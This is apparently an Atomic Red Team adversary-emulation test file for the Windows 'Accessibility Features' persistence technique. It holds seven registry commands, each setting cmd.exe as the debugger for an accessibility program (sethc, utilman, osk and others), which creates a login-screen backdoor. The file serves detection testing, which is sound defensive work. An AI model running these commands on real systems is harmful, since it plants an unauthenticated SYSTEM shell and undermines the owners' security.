---
attack_technique: T1015
display_name: Accessibility Features

atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: osk.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - sethc
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: sethc.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - utilman
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: utilman.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - magnify
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: magnify.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - narrator
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: narrator.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: DisplaySwitch.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

- name: Attaches Command Prompt As Debugger To Process - AtBroker
  description: |
    This allows adversaries to execute the attached process

  supported_platforms:
    - windows
  input_arguments:
    target_executable:
      description: File You Want To Attach cmd To
      type: String
      default: atbroker.exe

  executor:
    name: command_prompt
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
